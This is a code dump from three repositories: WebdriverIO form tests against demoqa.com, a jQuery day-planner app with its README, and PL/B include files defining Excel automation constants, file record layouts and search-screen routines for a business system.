return this.inputCurrentAddress.getAttribute("placeholder");
}
fillForm(obj) {
this.inputFirstName.setValue(obj.firstName);
this.inputLastName.setValue(obj.lastName);
this.inputEmail.setValue(obj.email);
this.inputMobile.setValue(obj.mobile);
this.inputCurrentAddress.setValue(obj.currentAddress);
}
get btnSubmit() {
return $("#submit");
}
}
export default new PracticeForm();
<file_sep>/Automation/test/specs/practiceForm.js
const expect = require("chai").expect;
import {textBoxLabels , checkBoxHobbies, registrationFormPlaceholders, studentRegistrationForm} from "../../expect";
import PracticeForm from "../../pageObjects/PracticeForm";
import {inputRegistrationForm} from "../../input";
describe('Validate Practice Form section', () => {
it('Validate the Labels in Text Box area', () => {
browser.maximizeWindow();
browser.url("https://demoqa.com/automation-practice-form");
expect(PracticeForm.labelHeader).to.equal(textBoxLabels.header);
expect(PracticeForm.labelName).to.equal(textBoxLabels.name);
expect(PracticeForm.labelEmail).to.equal(textBoxLabels.email);
expect(PracticeForm.labelGender).to.equal(textBoxLabels.gender);
expect(PracticeForm.labelMobileNumber).to.equal(textBoxLabels.mobile);
expect(PracticeForm.labelDateOfBirth).to.equal(textBoxLabels.dob);
expect(PracticeForm.labelSubjects).to.equal(textBoxLabels.subjects);
expect(PracticeForm.labelHobbies).to.equal(textBoxLabels.hobbies);
expect(PracticeForm.labelPicture).to.equal(textBoxLabels.picture);
expect(PracticeForm.labelCurrentAddress).to.equal(textBoxLabels.currentAddress);
expect(PracticeForm.labelStateAndCity).to.equal(textBoxLabels.stateAndCity);
});
it('Validate checkbox Hobbies', () => {
if (!PracticeForm.hobbiesSports.isDisplayedInViewport()) PracticeForm.hobbiesSports.scrollIntoView();
PracticeForm.hobbiesSports.nextElement().click();
PracticeForm.hobbiesReading.nextElement().click();
PracticeForm.hobbiesMusic.nextElement().click();
expect(PracticeForm.hobbiesSports.nextElement().getText()).to.equal(checkBoxHobbies.sports);
expect(PracticeForm.hobbiesReading.nextElement().getText()).to.equal(checkBoxHobbies.reading);
expect(PracticeForm.hobbiesMusic.nextElement().getText()).to.equal(checkBoxHobbies.music);
});
it('Validate Student Registration Form placeholders', () => {
expect(PracticeForm.inputFirstNamePlaceholder).to.equal(registrationFormPlaceholders.firstName);
expect(PracticeForm.inputLastNamePlaceholder).to.equal(registrationFormPlaceholders.lastName);
expect(PracticeForm.inputEmailPlaceholder).to.equal(registrationFormPlaceholders.email);
expect(PracticeForm.inputMobilePlaceholder).to.equal(registrationFormPlaceholders.mobile);
expect(PracticeForm.inputCurrentAddressPlaceholder).to.equal(registrationFormPlaceholders.currentAddress);
});
it('Fill Student Registration Form with Random data and submit', () => {
let myObj = inputRegistrationForm();
console.log(myObj);
PracticeForm.fillForm(myObj);
browser.pause(3000);
PracticeForm.btnSubmit.click();
browser.pause(3000);
});
// it('Fill Student Registration Form with Random data and submit', () => {
// expect(PracticeForm.inputFirstNamePlaceholder).to.equal(studentRegistrationForms.firstName);
// expect(PracticeForm.inputLastNamePlaceholder).to.equal(studentRegistrationForm.lastName);
// expect(PracticeForm.inputEmailPlaceholder).to.equal(studentRegistrationForm.email);
// expect(PracticeForm.inputMobilePlaceholder).to.equal(studentRegistrationForm.mobile);
// expect(PracticeForm.inputCurrentAddressPlaceholder).to.equal(studentRegistrationForm.current);
});
<file_sep>/CodeWars/HW.js
let obj = {
arr: [],
print: function () {
console.log(this.arr.filter((el) => el % 2 === 0));
},
initiate(x, y) {
this.x = 4;
this.y = 5;
},
sum: function () {
return this.x + this.y;
},
min: function () {
return Math.min(...this.arr);
},
grow: function () {
this.arr.sort((a, b) => a - b);
},
};
obj.arr.push(1, 2, 5, 6, 8, 9);
obj.print();
<file_sep>/Automation/expect.js
export const textBoxLabels = {
header: "Practice Form",
name: "Name",
email: "Email",
gender: "Gender",
mobile: "Mobile(10 Digits)",
dob: "Date of Birth",
subjects: "Subjects",
hobbies: "Hobbies",
picture: "Picture",
currentAddress: "Current Address",
stateAndCity: "State and City",
}
export const checkBoxHobbies = {
sports:"Sports",
reading:"Reading",
music:"Music",
}
export const URLs = {
elements: "https://demoqa.com/elements",
forms : "https://demoqa.com/forms",
alertsWindows : "https://demoqa.com/alertsWindows",
widgets : "https://demoqa.com/widgets",
interaction: "https://demoqa.com/interaction",
books: "https://demoqa.com/books",
textBox: "https://demoqa.com/text-box",
mainPage: "https://demoqa.com",
checkbox: "https://demoqa.com/checkbox",
radioButton: "https://demoqa.com/radio-button",
webTable: "https://demoqa.com/webtables"
}
// export const radioButtons = {
// header : "Radio Button",
// }
export const webPlaceholders = {
firstName:"<NAME>",
lastName: "<NAME>",
email: "<EMAIL>",
age: "Age",
salary:"Salary",
department: "Department"
}
export const registrationFormPlaceholders = {
firstName:"<NAME>",
lastName: "<NAME>",
email: "<EMAIL>",
mobile: "Mobile Number",
currentAddress:"Current Address",
}
export const studentRegistrationForm = {
firstName:"<NAME>",
lastName: "<NAME>",
email: "<EMAIL>",
mobile: "Mobile(10 Digits)",
currentAddress:"Current Address",
}
<file_sep>/Automation/input.js
const random = require("generate-random-data");
export function inputRegistrationForm() {
return {
firstName: random.maleFirstName(),
lastName: random.femaleFirstName(),
email: random.email("gmail.com"),
mobile: random.mobile(),
currentAddress: random.sentence(20,50)
};
}
| 29b3bfa318dade6f5dd69c2d9ad364edf57c7bfc | [
"JavaScript"
] | 7 | JavaScript | Darhan2020/-NY-Project | 81d3185c8f3dae6e6dfffedde8608a78e4166655 | 6f7b27d745ea780501863a996215da2c5fae6e1f |
refs/heads/main | <repo_name>stopdaydreaming/bossgirl-day-planner<file_sep>/assets/script.js
// Day-planner bootstrap: renders one editable time-block row per work hour
// (9AM-5PM), restores any previously saved text from localStorage, and wires
// up each row's save button. Requires jQuery and Moment.js to be loaded first.
$(document).ready(function() {
  // Show today's date in the page header.
  var todaysDate = $("#currentDay");
  todaysDate.text(moment().format("dddd, MMMM, Do YYYY"));

  var currHour = moment().hours();
  // Planner hours in 24-hour form: 9AM through 5PM.
  var timeOfDay = [9, 10, 11, 12, 13, 14, 15, 16, 17];

  for (var i = 0; i < timeOfDay.length; i++) {
    var row = $("<div>");
    row.addClass("row time-block");

    // Hour label, e.g. "9AM" — also used as the localStorage key below.
    var hour = $("<div>");
    var hourDisplay = moment()
      .set("hour", timeOfDay[i])
      .format("hA");
    hour.text(hourDisplay);
    hour.addClass("hour col-1 mt-1");
    row.append(hour);

    // Editable event text. `|| ""` guards against the null that
    // localStorage.getItem returns when nothing was saved for this hour.
    var textArea = $("<textarea>");
    textArea.val(localStorage.getItem(hourDisplay) || "");
    // BUGFIX: "past" was previously hard-coded into this class list, so every
    // row carried past styling even after present/future was added below.
    textArea.addClass("description col-10");
    row.append(textArea);

    var button = $("<button>");
    button.append('<i class="fas fa-save fa-md"></i>');
    button.addClass("saveBtn col-1");
    button.on("click", saveEvent);
    row.append(button);

    $(".container").append(row);

    // Color-code the row relative to the current hour.
    if (timeOfDay[i] === currHour) {
      textArea.addClass("present");
    } else if (timeOfDay[i] < currHour) {
      textArea.addClass("past");
    } else {
      textArea.addClass("future");
    }
  }

  // Save-button click handler: persists the row's text under its
  // hour label (e.g. "9AM") in localStorage.
  function saveEvent() {
    var hour = $(this)
      .siblings(".hour")
      .text();
    var textArea = $(this)
      .siblings(".description")
      .val();
    localStorage.setItem(hour, textArea);
  }
});
# Boss Girl Day Planner 💅
## Description
A simple calendar application that allows a user to save events for each hour of the day.
## Table of Contents
* [Installation](#installation)
* [Usage](#usage)
* [Credits](#credits)
* [License](#license)
* [Features](#features)
* [Contributing](#contributing)
* [Tests](#tests)
* [Badges](#badges)
## Installation
### Steps required to run locally
1. Clone/download the code in this repo
2. Navigate to the location of the code downloaded
3. Double-click on the html file provided in the downloaded code to preview
### Steps required to run online
1. Click the "VIEW SITE" link at the bottom of this README
## Usage
Use this code to create or modify a simple calendar application that lets a user save events for each hour of the workday.

## View Website
Click here to view the live website [VIEW SITE](https://stopdaydreaming.github.io/bossgirl-day-planner/)
## Credits
1 contributor: @stopdaydreaming
Special thanks to the study groups
## License
Copyright (c) Boss Girl Day Planner. All rights reserved.
Licensed under the [MIT](license.txt) license.
## Features
None at this time
## Contributing
None at this time
## Tests
None at this time
## Badges






 | 4e7634fe473d5fcc8ccfc74242585b9b1e5149a2 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | stopdaydreaming/bossgirl-day-planner | 6d4dcd87a9c2215f0d4ba787c6b4e78abd61e8c2 | 0ea9821668ed0156b53c27ac0bd6415cbe12b667 |
refs/heads/master | <repo_name>wobbly/NINCAL<file_sep>/include/xls.inc
.Variant Types0
VT_EMPTY EQU 0 .nothing
VT_NULL EQU 1 .SQL style null
VT_I2 EQU 2 .2 byte signed integer
VT_I4 EQU 3 .4 byte signed integer
VT_R4 EQU 4 .4 byte real - Float
VT_R8 EQU 5 .8 byte real - Double
VT_CY EQU 6 .Currency
VT_DATE EQU 7 .Date
VT_BSTR EQU 8 .OLE automation string
VT_DISPATCH EQU 9 .Idispatch FAR *
VT_ERROR EQU 10 .SCODE
VT_BOOL EQU 11 .Boolean - True = -1, False = 0
VT_VARIANT EQU 12 .VARIANT FAR *
VT_UNKNOWN EQU 13 .Unknown type
VT_UI1 EQU 17 .Unsigned character
VT_ARRAY EQU 0x2000 .Variant Array
. Modified 06/13/08 to allow more rows --- DH
.//In order to use any of the properties/methods associated with all parent objects
.//of the Worksheet, I need to create automation objects for each of them.
.//
.//Look at Excel Object Model to understand heirarchy. This can be found in hard
.//documentation: Microsoft Office 2000 Object Model Guide (found in MS Office 2000 Developers Edition).
.//Software available via PL/B Designer - create a Container object on a form, create an Excel
.//Spreadsheet, right click on Container object and Browse object. This will invoke the PL/B Object
.//Browser, which will give you SOME of the components of the Object Model. To browse the Object
.//Model in its entirety, open Excel. Under Tools menu select Macro, select Visual Basic Editor.
.//In the Visual Basic Editor screen, under the View menu, select Object Browser. There you can
.//view all of the objects/methods/properties in Excel. Right clicking on an item will give you
.//option to locate Help topics to see specifics.
.//
.//General heirarchy:
.// Excel Application
ex AUTOMATION class="Excel.Application"
.// Workbooks Collection (all open Workbooks)
books AUTOMATION
.// Single Workbook
book AUTOMATION
.// Worksheets Collection (all Worksheets in this Workbook)
sheets AUTOMATION
.// Single Worksheet
sheet AUTOMATION
sheet1 AUTOMATION
.// SortColumn (a Single Column in that Worksheet used for sorting)
sortcol AUTOMATION
sortcol1 AUTOMATION
.// Range within a worksheet
exrange AUTOMATION
PivotCaches AUTOMATION
PivotCache AUTOMATION
PivotTable AUTOMATION
DataFields AUTOMATION
DataField AUTOMATION
........................
.//bars automation
.//bar automation
.//menubar INTEGER 2,"0x00000006"
.......................
HPageBreaks AUTOMATION
HPageBreak AUTOMATION
.//Variable for use in spreadsheet
OTRUE VARIANT
OFALSE VARIANT
.//Zoom allows you to adjust the size of the data within a sheet in order to allow certain information to appear within a sheet.
Zoom85 VARIANT
Zoom80 VARIANT
Zoom75 VARIANT
Zoom70 VARIANT
Zoom65 VARIANT
Zoom60 VARIANT
Zoom55 VARIANT
VT_R8A EQU 5 .Double - 8 byte Real
.//A general width for columns - more may be added within your own program
xlColumnWidth VARIANT
.//Margins of a page
TopMargin VARIANT
BottomMargin VARIANT
LeftMargin VARIANT
RightMargin VARIANT
.//The thickness of a line
xlBorderWeightMedium VARIANT
.//Manually sets the page break when excel does not
xlPageBreakManual VARIANT
.//Have not used this yet
xlPageBreakAutomatic VARIANT
.//Index of a worksheet
SheetIndex VARIANT
TimePeriod VARIANT
xlCenter VARIANT
.//Average row height is 12 in 2003 15 in 2007
xlRowHeight VARIANT
.//Formatting vars needed
.//This constant was found in the Object Browser in Excel under the Help topic for the
.//HorizontalAlignment property of the Range object.
AlignLeft integer 4,"0xffffefdd"
AlignRight integer 4,"0xffffefc8"
AlignCenter integer 4,"0xffffeff4"
.//Tells how many sheets by default will appear in a new workbook - in 2003 it's 3
SheetsDefault integer 4,"0x00000000"
xlPortrait integer 4,"0x1" .1
xlLandscape integer 4,"0x2" .2
xlMinimized integer 4,"0xFFFFEFD4"
xlUnderlineStyleSingle integer 4,"0x2"
.// //LineStyle 1 = Continuous
.// //LineStyle 4 = Dash Dot
.// //Object Viewer Help tells us that xlInsideHorizontal has a value of "12" Decimal
.// //Object Viewer Help tells us that xlInsideVertical has a value of "11" Decimal
.// //Object Viewer Help tells us that xlEdgeright has a value of "10" Decimal
.// sheet.range("B11:b37").BorderAround using *LineStyle=1,*Weight=3
.//Used to define range borders
xlInsideHorizontal integer 4,"0x12" .Borders inside defined range
xlInsideVertical integer 4,"0x11" .Borders inside defined range
XlEdgeRight integer 4,"0x10" .Borders right edge of defined range
.//Delete Cell and Direct Which way to shift cells
.// Sheet.Range("L1:L37").Delete Using xlShiftToLeft
.// Sheet.Range(CellRange).Delete Using xlShiftUp
.//
XLShiftToLeft Variant .range delete shift to left
XLShiftUp Variant .range delete shift Up
xlCSV Variant
xlDatabase integer 4,"0x1"
xlRowField integer 4,"0x1"
xlColumnField integer 4,"0x2"
xlsum Variant
xlDataAndLabel integer 4,"0x0"
xlPivotTableVersion12 integer 4,"0x3"
.//Variable used to pack with cell corrdinates
.// Pack Cell,"A","5"
Cell DIM 7
Cell1 DIM 7
.Cell DIM 5
.Cell1 DIM 5
.//Variable Used to pack range that you will set properties on.
.//Pack Cell,"A",Str5
.//Pack Cell1,"S",str5
.//Pack CellRange,Cell,":",Cell1
CellRange DIM 255
CellRowCnt Form 6
CellRowCnt1 Form 6
CellRowCnt2 Form 6
CurCellNum Form 6
.CellRowCnt Form 5
.CellRowCnt1 Form 5
.CellRowCnt2 Form 5
.CurCellNum Form 5
.//used to keep track of what row you are on for so you can id when a soft page break will occur - soft page break is when excel does an auto page break
.//Max row before a soft page break on page 1 - Page 1 appears to have a different max then do the other pages may be because i repeat the header on other pages.
RowMaxPage1 Form 9
.//Max row before a soft page break - all except page 1
RowMax Form 9 //Max row before a soft page break
.//Colors for font coloring
Red Color
RGB Form 24
SourceData VARIANT
XLSNAME DIM 255
.//Source Data for Pivot Table
. create SourceData,VarType=VT_BSTR,VarValue="diskin57!A1:F7308"
.//Create the Variant objects
.//Initialize variables
.//Zoom initialization Values
create Zoom85,VarType=VT_I4,VarValue=85
create Zoom80,VarType=VT_I4,VarValue=80
create Zoom75,VarType=VT_I4,VarValue=75
create Zoom70,VarType=VT_I4,VarValue=70
create Zoom65,VarType=VT_I4,VarValue=65
create Zoom60,VarType=VT_I4,VarValue=60
create Zoom55,VarType=VT_I4,VarValue=55
.//Boolean Values
create OTRUE,VarType=VT_BOOL,VarValue=1
create OFALSE,VarType=VT_BOOL,VarValue=0
.//should be defined by your prgram as they may need to be formatted differently
.// create xlColumnWidth,VarType=VT_R8,VarValue="0.0"
.//"1" increment in Excel interface equals "1.3888" in OLE logic
.// create TopMargin,VarType=VT_R8,VarValue="18" Roughly equals .25 inches: 18 * 1.388 = 25
.// create BottomMargin,VarType=VT_R8,VarValue="36" Roughly equals .50 inches: 36 * 1.388 = 50
.// create LeftMargin,VarType=VT_R8,VarValue="14" Roughly equals .25 inches: 18 * 1.388 = 25
.// create xlRowHeight,VarType=VT_R8,VarValue="15.0"
.//Constants
create xlPageBreakManual,VarType=VT_R8,VarValue="-4135"
create xlPageBreakAutomatic,VarType=VT_R8,VarValue="-4105"
create xlCenter,VarType=VT_R8,VarValue="-4108"
create xlBorderWeightMedium,VarType=VT_R8,VarValue="-4138"
create SheetIndex,VarType=VT_I4
create xlShifttoLeft,VarType=VT_R8,VarValue="-4159"
create xlShiftUp,VarType=VT_R8,VarValue="-4162"
create xlsum,VarType=VT_R8,VarValue="-4157" (&HFFFFEFC3)
create xlCSV,VarType=VT_I4,VarValue="6"
//create red for font
create Red=255:0:0
getitem Red,0,RGB
create Timeperiod,VarType=(VT_ARRAY+VT_BOOL),VarValue=OFALSE
.test1
. Move (VT_ARRAY+VT_BOOL),TimePeriod
.vtarrayt integer 4 ..array of integers
. MOVE (VT_ARRAY+VT_BOOL),vtarrayt ;or same as add in this case ;)
.CREATE safearray,VARTYPE=vtarrayt
<file_sep>/include/nowndd.inc
..............................................................................
.
. NOWNDD INCLUSION
. NIN OWNER FILE DEFINITION
.
. FILE NAME : NINOWN
. REC LENGTH: 190 FIXED
. INDEX KEY : 3-6 (OWNLON)
. AIM KEY : 7-56
.2015 February 12 : DLH add No shipping request logic
.2014 April 2 : DLH add lock logic
.2014 March DLH add room to email
.2011 August 23: DLH add more room & suppress LO print copies, and for future galley monthly report
.2010 June 04 : DLH add secondary file maint for DupeOwn
.2009Jan14 : comp codes DLH
.20080124 Email DLH
. 09Dec2000 Change IP address of File manager DMB
. 09Dec2000 use filelist
..10sep96 inactive code, batch code for lcr's, century - dlh
..16may95 add 2nd fax number for accounting.
..............................................................................
.
.NOWNNAME INIT "NINOWN.dat|20.20.30.103:502"
DOWNNAME INIT "DUPEOWN.dat|NINS1:502"
DOWNFLE1 IFILE KEYLEN=4,FIXED=120,Name="DupeOWN.isi|NINS1:502"
DOWNKEY DIM 4 1-4 *DUPE OWNER FILE.
Down1 DIM 1 5-5 Fill
Downkey2 DIM 4 6-9 OWNER NUMBER TO BE USED FROM DUPEOWN FILE.
Down2 DIM 1 10-10 FIll
DOWNDES DIM 50 11-60 DESCRIPTION
Down3 Dim 60 Fill
Downflg1 Form 1
Downfld Dim 4
.................................................................................
NOWNNAME INIT "NINOWN.dat|NINS1:502"
NOWNFLD DIM 4
OwnFList Filelist
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|20.20.30.103:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi|NINS1:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=241,Name="NINOWN.isi|NINS1:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=260,Name="NINOWN.isi|NINS1:502"
NOWNFLE1 IFILE KEYLEN=4,FIXED=310,Name="NINOWN.isi|NINS1:502"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|20.20.30.103:502"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM|NINS1:502"
.NOWNFLE2 AFILE FIXED=241,Name="NINOWN.AAM|NINS1:502"
.NOWNFLE2 AFILE FIXED=260,Name="NINOWN.AAM|NINS1:502"
NOWNFLE2 AFILE FIXED=310,Name="NINOWN.AAM|NINS1:502"
.NOWNFLE1 IFILE KEYLEN=4,FIXED=190,Name="NINOWN.isi"
.NOWNFLE2 AFILE FIXED=190,Name="NINOWN.AAM"
filelistend
NOWNFLE3 FILE FIXED=310
.NOWNFLE3 FILE FIXED=260
.NOWNFLE3 FILE FIXED=190
NOWNFLD2 DIM 53
NOWNFLG1 FORM 1
NOWNFLG2 FORM 1
NOWNFLG3 FORM 1
NOWNPATH FORM 1
NOWNLOCK FORM 1 0 or 1=File Locks, 3=Record Locks, 3=No Locks
.
....................................................................
. ownvars: record layout for the NINOWN list-owner master
. (FIXED=310; ISAM key = OWNLON 3-6, AIM key = 7-56).
. NOTE(review): byte offsets below were recomputed from the DIM
. sizes and total 310; the OWNLOC, OWNPASS, OWNRDTE and ownfax2
. annotations had drifted and are corrected here (comments only —
. actual positions are determined by declaration order and size).
....................................................................
ownvars list
OWNLOC DIM 1 001-001 'B'... "P" for PLI COnversion 'M' from MIN
OWNBLK DIM 1 002-002 BLANK '0 LIst owners that don't allow samples = 1
OWNLON DIM 4 003-006 OWNER NUMBER
OWNLONM DIM 25 007-031 CONTACT NAME
OWNOCPY DIM 25 032-056 COMPANY NAME
OWNLOSA DIM 25 057-081 ADDRESS
OWNLOCTY DIM 15 082-096 CITY
OWNLOS DIM 2 097-098 STATE
OWNLOZC DIM 10 099-108 ZIP CODE
OWNNEC DIM 1 109-109 NUMBER OF CARBON COPIES
OWNCTN DIM 16 110-125 CARBON COPY TO
OWNTELE DIM 10 126-135 TELEPHONE NUMBER
OWNPASS DIM 10 136-145 PERSON LAST UPDATED BY (offset corrected; was 136-144)
OWNRDTE DIM 8 146-153 REVISED DATE mm,dd,cc,yy (offset corrected; was 145-153)
owngally dim 1 154-154 'T'rue = lcr's get combined galley request
OWNTAXID DIM 15 155-169 TEFRA TAX ID CODE.
OWNFAX DIM 10 170-179 FAX NUMBER.
ownfax2 dim 10 180-189 2nd fax ie acct. (offset corrected; was 178-189)
OWNstat DIM 1 190-190 "I"nactive
OwnTranFlag Dim 1 191-191 -Send Fulfilment info via: ' '=fax or print based on presence of fax#
. 2=FTP, 1= Email.......
.begin patch
OwnEmail Dim 100 192-291 corporate email
OwnCOMp Dim 6 292-297 company code
OwnCont Dim 3 298-300 Contact code
OwnCopy Dim 1 301-301 Y or " "-print LO copies of orders (default) or N-no print
OwnNoSHP Dim 1 302-302 N or " "-send LO shipping info requests (default) or Y-suppress requests (nshp0007.pls)
OwnFIll Dim 8 303-310
.OwnFIll Dim 9 302-310
.OwnEmail Dim 50 192-241 corporate email
.OwnCOMp Dim 6 242-247 company code
.OwnCont Dim 3 248-250 Contact code
.OwnCopy Dim 1 251-251 Y or " "-print LO copies of orders (default) or N-no print
.OwnFIll Dim 9 252-260
.end patch
. NOTE(review): the "+++..." line below looks like stray line noise — verify it is not meaningful before removing.
+++-+---+-++--- -+
listend
..............................................................................*
LISTOFF
.PROGRAM ACCESS.
.NAME TYPE ACCESS
LISTON
<file_sep>/include/searchio.INC
...................................................................
.
. SEARCH INCLUSION
.
. HANDLES ALL COMMON ROUTINES USED WITH SEARCH.PLF
.
.
. RELEASE 1.5 DLH 2014 July 28 search for Service B.
. RELEASE 1.4 DLH 1/18/07 search for Fulfillment (RTN)
. RELEASE 1.3 ASH 10/26/04 ADDED LOGIC TO DISPLAY COMPANY NUMBER
. RELEASE 1.2 ASH 09/17/02 ADDED OWNER
. RELEASE 1.1 ASH 01/31/02 REPLACED DATALIST WITH MSLISTVIEW OBJECT
. RELEASE 1.0 ASH 03/10/99 INITIAL RELEASE
....................................................................
....................................................................
. ENTRY POINT: SEARCHSETTITLE
. REQUIRED : SEARCH.PLF
. RETURNED :
. DESCRIPTION: DYNAMICALLY CHANGES TITLE ON SEARCH.PLF
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
....................................................................
. SearchSetTitle: sets the Search window's title to match the active
. search mode. SrchFlag (1-8) selects Broker / List / Mailer /
. Ship-To / Campaign / Owner / Fulfillment (RTN-To) / Service Bureau
. via the BRANCH below; all paths fall through to SearchSetTitDone.
....................................................................
SearchSetTitle
.Dynamically changes
.START PATCH 1.4 ADDED LOGIC
.START PATCH 1.5 ADDED LOGIC
        branch SrchFlag to SearchSetTit1,SearchSetTit2,SearchSetTit3,SearchSetTit4,SearchSetTit5,SearchSetTit6,SearchSetTit7,SearchSetTit8
.       branch SrchFlag to SearchSetTit1,SearchSetTit2,SearchSetTit3,SearchSetTit4,SearchSetTit5,SearchSetTit6,SearchSetTit7
.End PATCH 1.5
.       branch SrchFlag to SearchSetTit1,SearchSetTit2,SearchSetTit3,SearchSetTit4,SearchSetTit5,SearchSetTit6
.End PATCH 1.4 ADDED LOGIC
SearchSetTit1
        setprop Search,title="Broker Search"
        goto SearchSetTitDone
SearchSetTit2
        setprop Search,title="List Search"
        goto SearchSetTitDone
SearchSetTit3
        setprop Search,title="Mailer Search"
        goto SearchSetTitDone
SearchSetTit4
        setprop Search,title="Ship-To Search"
        goto SearchSetTitDone
SearchSetTit5
        setprop Search,title="Campaign Search"
        goto SearchSetTitDone
.START PATCH 1.2 ADDED LOGIC
SearchSetTit6
        setprop Search,title="Owner Search"
        goto SearchSetTitDone
.END PATCH 1.2 ADDED LOGIC
.START PATCH 1.4 ADDED LOGIC
SearchSetTit7
        setprop Search,title="Fulfillment (RTN-To) Search"
        goto SearchSetTitDone
.END PATCH 1.4 ADDED LOGIC
.START PATCH 1.5 ADDED LOGIC
SearchSetTit8
        setprop Search,title="Service Bureau Search"
        goto SearchSetTitDone
.END PATCH 1.5 ADDED LOGIC (was mislabeled ".END PATCH 1.4")
SearchSetTitDone
        return
....................................................................
. ENTRY POINT: SEARCHSETVISIBLE
. REQUIRED : SEARCH.PLF
. RETURNED :
. DESCRIPTION: REFRESHES SEARCH.PLF AND MAKES VISIBLE
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
....................................................................
. SearchSetVisible: resets the Search window to a clean starting
. state and shows it — combo box set to the current SrchFlag mode,
. "free-form" checkbox set on (1), entry text and all status text
. fields cleared, ListView results cleared, focus on the entry box.
....................................................................
SearchSetVisible
        setitem SearchComboBox,0,SrchFlag
        setitem SearchCheckFree,0,1
        setitem SearchEditText,0,""
        setitem SearchStatText2,0,""
        setitem SearchStatText3,0,""
        setitem SearchStatText4,0,""
.START PATCH 1.3 REPLACED LOGIC
        setitem SearchStatText6,0,""
.END PATCH 1.3 REPLACED LOGIC
.START PATCH 1.1 REPLACED LOGIC
.       deleteitem SearchDataList,0
. MSListView replaced the old DataList control (patch 1.1).
        SearchListView.ListItems.Clear
.END PATCH 1.1 REPLACED LOGIC
        setfocus SearchEditText
        setprop Search,visible=1
        return
....................................................................
. ENTRY POINT: SEARCHENABLE
. REQUIRED : SEARCH.PLF
. RETURNED :
. DESCRIPTION: ENABLES BUTTONS, USUALLY FOLLOWED BY ANOTHER 'RETURN' TO
. SEARCH.PLF AFTER AN ERROR MESSAGE REGARDING SEARCHING.
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
....................................................................
. SearchEnable: re-enables the OK/Close buttons and the mode combo
. box, clears SrchKey and refocuses the entry box. Typically called
. after an error message so the user can retry the search.
....................................................................
SearchEnable
        setfocus SearchEditText
        reset SrchKey
        setprop SearchOK,enabled=1
        setprop SearchClose,enabled=1
        setprop SearchComboBox,enabled=1
        return
....................................................................
. ENTRY POINT: SEARCHCLEAR
. REQUIRED : SEARCH.PLF
. RETURNED :
.START PATCH 1.1 REPLACED LOGIC
.. DESCRIPTION: CLEARS DATALIST AND STATTEXT BOXES, USUALLY BEFORE A SEARCH
. DESCRIPTION: CLEARS LISTVIEW AND STATTEXT BOXES, USUALLY BEFORE A SEARCH
.END PATCH 1.1 REPLACED LOGIC
. PROGRAMMER : <NAME> 03/10/99
. INITIAL RELEASE
....................................................................
....................................................................
. SearchClear: empties the ListView result list and blanks status
. text fields 2-6, usually called before running a new search.
....................................................................
SearchClear
.START PATCH 1.1 REPLACED LOGIC
.       deleteitem SearchDataList,0
. MSListView replaced the old DataList control (patch 1.1).
        SearchListView.ListItems.Clear
.END PATCH 1.1 REPLACED LOGIC
        setitem SearchStatText2,0,""
        setitem SearchStatText3,0,""
        setitem SearchStatText4,0,""
.START PATCH 1.1 ADDED LOGIC
        setitem SearchStatText5,0,""
.END PATCH 1.1 ADDED LOGIC
.START PATCH 1.3 REPLACED LOGIC
        setitem SearchStatText6,0,""
.END PATCH 1.3 REPLACED LOGIC
        return
<file_sep>/include/statsdd.inc
..............................................................................
.
. statsDD INCLUSION
. Stats FILE DEFINITION
.
. FILE NAME : NINSTATs
. REC LENGTH: FIXED
. INDEX KEY :
.
.Patch 01/25/2005 - ASH Converted Mailer/Broker fields
.Patch 04/17/2002 - ASH Added Select Universe field
.Patch 02/22/2002 - ASH Added Busy Byte
.Patch 02/20/2002 - ASH Added Aamdex for History Screen in Program 1
..............................................................................
.
StatFLst Filelist
.Start Patch 01/25/2005 - Replaced logic
.statFILE IFILE KEYLEN=29,FIXED=501,UNCOMP,Name="NINSTATS.ISI|20.20.30.103:502"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI|20.20.30.103:502"
..Start Patch 02/20/2002
.statFLE3 AFILE FIXED=501,UNCOMP,Name="NINSTATS.AAM|20.20.30.103:502"
..End Patch 02/20/2002
....................................
.Patch 06/18/2005 Begin
.statFILE IFILE KEYLEN=31,FIXED=501,UNCOMP,Name="NINSTATS.ISI|20.20.30.103:502"
statFILE IFILE KEYLEN=31,FIXED=501,UNCOMP,Name="NINSTATS.ISI|NINS1:502"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI|20.20.30.103:502"
statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI|NINS1:502"
.statFLE3 AFILE FIXED=501,UNCOMP,Name="NINSTATS.AAM|20.20.30.103:502"
statFLE3 AFILE FIXED=501,UNCOMP,Name="NINSTATS.AAM|NINS1:502"
.End Patch 01/25/2005 - Replaced logic
.statFILE IFILE KEYLEN=29,FIXED=501,UNCOMP,Name="NINSTATS.ISI"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI"
.statFILE IFILE KEYLEN=29,FIXED=501,UNCOMP,Name="NINSTATS.ISI"
.statFLE2 IFILE KEYLEN=6,FIXED=501,UNCOMP,Name="NINSTAT2.ISI"
Filelistend
statNAME INIT "NINSTATS"
statNME2 INIT "NINSTAT2"
.PROJECTION FILE
Stat2FLst Filelist
.stat2FILE IFILE KEYLEN=9,FIXED=501,UNCOMP,Name="NIN2STATS.ISI|20.20.30.103:502"
stat2FILE IFILE KEYLEN=9,FIXED=501,UNCOMP,Name="NIN2STATS.ISI|NINS1:502"
.stat2FLE2 AFILE FIXED=501,UNCOMP,Name="NIN2STATS.AAM|20.20.30.103:502"
stat2FLE2 AFILE FIXED=501,UNCOMP,Name="NIN2STATS.AAM|NINS1:502"
.stat2FILE IFILE KEYLEN=9,FIXED=501,UNCOMP,Name="NIN2STATS.ISI"
.stat2FLE2 AFILE FIXED=501,UNCOMP,Name="NIN2STATS.AAM"
Filelistend
.Patch 06/18/2005 End
stat2NAME INIT "NIN2STATS"
.stat2NME2 INIT "NIN2STAT2"
